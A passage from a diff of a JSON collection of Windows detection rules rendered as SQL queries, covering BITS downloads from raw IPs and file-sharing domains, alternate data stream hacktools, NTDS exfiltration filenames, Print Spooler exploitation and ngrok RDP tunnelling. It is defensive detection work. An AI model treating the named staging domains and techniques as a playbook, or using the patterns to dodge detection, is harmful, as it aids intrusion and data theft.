OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", - "falsepositives": [ - "Application installation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "file_rename_win_not_dll_to_dll.yml" - }, - { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "status": "test", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "status": "experimental", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + 